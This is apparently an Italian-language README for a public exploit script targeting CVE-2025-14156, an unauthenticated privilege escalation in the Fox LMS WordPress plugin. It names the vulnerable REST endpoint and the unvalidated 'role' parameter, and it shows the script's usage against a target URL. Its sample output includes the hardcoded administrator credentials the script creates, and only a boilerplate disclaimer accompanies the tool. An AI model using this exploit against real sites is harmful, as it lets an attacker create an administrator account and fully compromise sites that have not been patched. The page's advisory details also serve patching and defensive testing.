
Fox LMS – Plugin WordPress LMS 1.0.4.7 - 1.0.5.1 - Escalation dei privilegi non autenticata tramite 'createOrder'
Fox LMS – Plugin WordPress LMS 1.0.4.7 - 1.0.5.1 - Escalation di privilegi non autenticata tramite 'createOrder'
Fox LMS – Plugin WordPress LMS (v1.0.4.7 a v1.0.5.1) – Escalation di privilegi non autenticata tramite createOrder
Tutte le versioni fino alla 1.0.5.1 inclusa di Fox LMS per WordPress sono vulnerabili all'escalation di privilegi. L'endpoint REST API /fox-lms/v1/payments/create-order non valida correttamente il parametro 'role' quando crea nuovi utenti, consentendo a utenti non autenticati di creare account con ruoli arbitrari, incluso Amministratore.
CVE: CVE-2025-14156
Punteggio CVSS: 9.8 (Critico)
Rischio: Compromissione completa del sito.
CVE-2025-14156.py
python CVE-2025-14156.py -help
usage: CVE-2025-14156.py [-h] -u URL
CVE-2025-14156 Exploit By: Nxploited | Telegram: @Nxploited | Github: Nxploited
options:
-h, --help show this help message and exit
-u, --url URL Target URL (e.g. https://victim.site)
python CVE-2025-14156.py -u https://victim.site
In caso di exploit riuscito, lo script restituirà solo:
[+] Exploit Successful!
Username: nxploited
Password: Nxploited@2025Strong
Se l'exploit fallisce, verrà mostrato solo un messaggio di errore conciso.
'administrator'.Questo strumento è destinato esclusivamente a scopi educativi e a test autorizzati. Qualsiasi uso non autorizzato contro sistemi senza permesso esplicito è illegale. L'autore non è responsabile per usi impropri, danni o conseguenze legali derivanti dall'uso di questo script. Segui sempre pratiche di divulgazione responsabile e assicurati di avere un'autorizzazione scritta prima di testare qualsiasi target.
Telegram: @Nxploited
Github: Nxploited